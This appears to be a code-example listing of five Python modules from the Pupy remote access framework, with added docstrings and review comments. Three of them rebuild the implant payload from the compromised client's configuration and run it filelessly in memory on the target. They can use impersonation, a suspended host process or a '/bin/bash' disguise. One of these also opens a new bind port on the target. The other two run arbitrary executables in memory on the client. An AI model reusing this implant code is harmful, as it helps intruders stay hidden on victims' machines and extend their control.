Ejemplo n.º 1
    def run(self, args):
        """Rebuild the client binary from its current configuration and start
        it in memory on the same host.

        The binary is produced by ``pupygen.generate_binary_from_template``
        from ``self.client.get_conf()`` for the client's platform and
        architecture, then handed to the platform launcher as a raw image
        (``exec_pe`` on Windows, ``mexec`` on Linux). Progress is reported
        through ``self.success``.

        Args:
            args: parsed module arguments; only ``args.impersonate`` and
                ``args.process`` are read, and only on the Windows branch.

        Returns:
            None.
        """
        self.success("looking for configured connect back address ...")
        conf = self.client.get_conf()
        desc = self.client.desc
        image, template, _ = pupygen.generate_binary_from_template(
            conf, desc['platform'], arch=self.client.arch)
        self.success(
            "Generating the payload with the current config from {} - size={}".format(
                template, len(image)))
        self.success("Executing the payload from memory ...")
        if self.client.is_windows():
            # Raw PE image, no file path. Per the flag names this runs
            # non-interactively, forked, without a timeout, and optionally
            # under impersonation / inside a suspended host process chosen
            # by the operator — confirm against exec_pe's signature.
            exec_pe(self, "", raw_pe=image, interactive=False, fork=True,
                    timeout=None, use_impersonation=args.impersonate,
                    suspended_process=args.process)
        elif self.client.is_linux():
            # Raw image presented with argv[0] '/bin/bash'; stdout capture is
            # off and the caller is not terminated (per the flag names).
            mexec(self, image, [], argv0='/bin/bash', stdout=False, raw=True,
                  terminate=False)

        # Emitted regardless of platform: on a client that is neither Windows
        # nor Linux nothing was executed, so this message is misleading there.
        self.success("pupy payload executed from memory")
Ejemplo n.º 2
    def run(self, args):
        """Rebuild the client binary from its current configuration and start
        it in memory on the same host.

        When the client was started with a ``bind`` launcher on Windows, the
        operator is prompted for a different listening port and
        ``launcher_args`` is rewritten so the new instance does not listen on
        the same port as the running one; the ``--oneliner-host`` argument
        (and its value) is blanked because it is not compatible with the exe
        payload. Progress is reported through ``self.info`` / ``self.success``.

        Args:
            args: parsed module arguments; only ``args.impersonate`` and
                ``args.process`` are read, and only on the Windows branch.

        Returns:
            None.
        """
        # Useful for bind connections: the running launcher's type and
        # the address:port it was started with.
        launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
        newClientConf = self.client.get_conf()
        listeningAddressPort =None # Only set on the Windows + bind path below
        if self.client.is_windows() and launcherType == "bind":
            listeningPort = -1
            self.info('The current pupy launcher is using a BIND connection on the Windows target.')
            self.info('It is listening on {0} on the target'.format(addressPort))
            self.info('For the duplication, you have to choose another port and it will '
                      'listen on this new specific port on the target')
            self.info("Be careful, you have to choose a port which is not used on the target!")
            self.info("Be careful to firewall configuration/rules on the target too...")
            while listeningPort==-1:
                try:
                    # NOTE(review): any integer is accepted here — there is no
                    # 1-65535 range check, and 0 or a negative value other than
                    # -1 ends the loop. If this file runs under Python 2,
                    # input() evaluates the typed text; raw_input() would be
                    # the safe form — confirm the interpreter version.
                    listeningPort = int(input("[?] Give me the listening port to use on the target: "))
                except Exception as e:
                    # Broader than the ValueError int() raises; KeyboardInterrupt
                    # still propagates since it is not an Exception subclass.
                    self.warning("You have to give me a valid port. Try again. ({})".format(e))
            # NOTE(review): takes everything before the first ':', which
            # truncates an IPv6 literal address — rsplit(':', 1) would not.
            listeningAddress = addressPort.split(':')[0]
            listeningAddressPort = "{0}:{1}".format(listeningAddress, listeningPort)
            self.info("The new pupy instance will listen on {0} on the target".format(listeningAddressPort))
            # Fetched a second time before mutating; presumably to start from
            # a fresh copy — TODO confirm get_conf() returns a copy rather than
            # the live client configuration, which would otherwise be altered.
            newClientConf = self.client.get_conf()
            # Modify the listening port on the conf. If it is not modified,
            # the payload will listen on the same port as the initial pupy launcher on the target.
            # Raises ValueError if '--port' is not present in launcher_args (no fallback).
            newClientConf['launcher_args'][newClientConf['launcher_args'].index("--port")+1] = str(listeningPort)
            # Delete --oneliner-host argument, not compatible with exe payload.
            # Entries are blanked rather than removed, presumably so indices
            # stay stable while iterating. Substring match; pos+1 raises
            # IndexError if the flag is the last element.
            for pos, val in enumerate(newClientConf['launcher_args']):
                if "--oneliner-host" in val:
                    newClientConf['launcher_args'][pos]=""
                    newClientConf['launcher_args'][pos+1]=""

        self.success("Generating the payload...")
        # Note the extra leading self.log argument compared with other
        # callers of generate_binary_from_template in this listing; the
        # signature evidently differs between versions.
        payload, tpl, _ = pupygen.generate_binary_from_template(
            self.log,
            newClientConf,
            self.client.desc['platform'],
            arch=self.client.arch
        )
        self.success("Payload generated with the current config from {} - size={}".format(tpl, len(payload)))
        self.success("Executing the payload from memory ...")
        if self.client.is_windows():
            # Raw PE image, no file path; impersonation and suspended host
            # process are operator-chosen (per the flag names — confirm
            # against exec_pe's signature).
            exec_pe(
                self, "", raw_pe=payload, interactive=False,
                use_impersonation=args.impersonate, suspended_process=args.process,
                wait=False
            )
        elif self.client.is_linux():
            # Raw image presented with argv[0] '/bin/bash'.
            mexec(self, payload, [], argv0='/bin/bash', raw=True)
        # Emitted regardless of platform: on a client that is neither Windows
        # nor Linux nothing was executed, so this message is misleading there.
        self.success("pupy payload executed from memory")
        if self.client.is_windows() and launcherType == "bind":
            self.success(
                    'You have to connect to the target manually on {0}: '
                    'try "connect --host {0}" in pupy shell'.format(listeningAddressPort))
Ejemplo n.º 3
    def run(self, args):
        """Rebuild the client binary from its current configuration and start
        it in memory on the same host.

        ``pupygen.generate_binary_from_template`` is fed ``self.client.get_conf()``
        plus the client's platform and architecture; the resulting raw image is
        passed to ``exec_pe`` (Windows) or ``mexec`` (Linux). Progress is
        reported through ``self.success``.

        Args:
            args: parsed module arguments; only ``args.impersonate`` and
                ``args.process`` are read, and only on the Windows branch.

        Returns:
            None.
        """
        self.success("looking for configured connect back address ...")
        client = self.client
        image, source_tpl, _ = pupygen.generate_binary_from_template(
            client.get_conf(), client.desc['platform'], arch=client.arch)
        self.success(
            "Generating the payload with the current config from {} - size={}"
            .format(source_tpl, len(image)))
        self.success("Executing the payload from memory ...")
        if client.is_windows():
            # Raw PE image, no file path. Per the flag names: non-interactive,
            # forked, no timeout, optional impersonation / suspended host
            # process chosen by the operator — confirm against exec_pe.
            windows_opts = dict(
                raw_pe=image, interactive=False, fork=True, timeout=None,
                use_impersonation=args.impersonate,
                suspended_process=args.process)
            exec_pe(self, "", **windows_opts)
        elif client.is_linux():
            # Raw image presented with argv[0] '/bin/bash'; stdout capture off,
            # caller not terminated (per the flag names).
            mexec(self, image, [], argv0='/bin/bash', stdout=False, raw=True,
                  terminate=False)

        # Emitted regardless of platform: on a client that is neither Windows
        # nor Linux nothing was executed, so this message is misleading there.
        self.success("pupy payload executed from memory")
Ejemplo n.º 4
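 def run(self, args):
     """Start a caller-supplied executable on the client.

     Dispatches to ``exec_pe`` on Windows and ``mexec`` on Linux; on any
     other platform nothing is executed and no message is emitted.

     Args:
         args: parsed module arguments. ``args.path`` names the executable and
             ``args.args`` its arguments; ``args.interactive`` is forwarded to
             both launchers; ``args.impersonate`` and ``args.suspended_process``
             apply to Windows only; ``args.argv0`` overrides argv[0] on Linux
             (defaults to the basename of ``args.path``).

     Returns:
         None. The launchers' return values are discarded (the former ``log``
         local was never read).
     """
     if self.client.is_windows():
         exec_pe(
             self, args.args,
             path=args.path, interactive=args.interactive,
             use_impersonation=args.impersonate,
             suspended_process=args.suspended_process
         )
     elif self.client.is_linux():
         mexec(
             self, args.path, args.args,
             argv0=args.argv0 or path.basename(args.path),
             interactive=args.interactive
         )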
Ejemplo n.º 5
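    def run(self, args):
        """Start a caller-supplied executable on the client and optionally
        save the launcher's returned output to a local file.

        Dispatches to ``exec_pe`` on Windows and ``mexec`` on Linux; on any
        other platform nothing is executed and no message is emitted.

        Args:
            args: parsed module arguments. ``args.path`` names the executable and
                ``args.args`` its arguments; ``args.interactive`` is forwarded to
                both launchers; ``args.fork``, ``args.timeout``, ``args.impersonate``
                and ``args.suspended_process`` apply to Windows only; ``args.argv0``
                overrides argv[0] on Linux (defaults to the basename of ``args.path``);
                ``args.log`` is a local file path that receives the launcher's
                return value when both are truthy.

        Returns:
            None.
        """
        # Default so the check below is well-defined on a client that is
        # neither Windows nor Linux; without it the name is unbound there and
        # the method raises UnboundLocalError instead of skipping the write.
        log = None
        if self.client.is_windows():
            log = exec_pe(
                self, args.args,
                path=args.path, interactive=args.interactive,
                fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate,
                suspended_process=args.suspended_process
            )
        elif self.client.is_linux():
            log = mexec(
                self, args.path, args.args,
                argv0=args.argv0 or path.basename(args.path),
                interactive=args.interactive
            )

        # NOTE(review): opened in binary mode, so the launcher is assumed to
        # return bytes (or a falsy value) — confirm against exec_pe / mexec.
        if log and args.log:
            with open(args.log, 'wb') as output:
                output.write(log)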